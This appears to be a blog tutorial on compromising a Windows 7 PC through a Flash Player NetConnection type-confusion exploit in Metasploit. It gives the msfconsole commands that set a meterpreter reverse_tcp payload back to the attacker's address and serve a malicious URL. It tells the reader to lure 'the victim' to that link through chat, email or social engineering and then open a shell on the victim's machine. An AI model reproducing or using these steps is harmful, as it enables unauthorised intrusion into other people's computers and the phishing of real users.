Hack Remote Windows PC using Adobe Flash Player NetConnection Type Confusion

This module exploits type confusion vulnerability in the NetConnection class on Adobe Flash Player. When using a correct memory layout this vulnerability allows to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like vectors, and finally accomplish remote code execution. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305.

Exploit Targets
Flash 16.0.0.305

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/browser/adobe_flash_net_connection_confusion
msf exploit (adobe_flash_net_connection_confusion)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_net_connection_confusion)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (adobe_flash_net_connection_confusion)>set srvhost 192.168.1.7
msf exploit (adobe_flash_net_connection_confusion)>set uripath /
msf exploit (adobe_flash_net_connection_confusion)>exploit


Now an URL you should give to your victim http://192.168.1.7:8080

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.1.7:8080) a session will be opened as shown below


Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into
Victims command prompt.

0 comments:

Post a Comment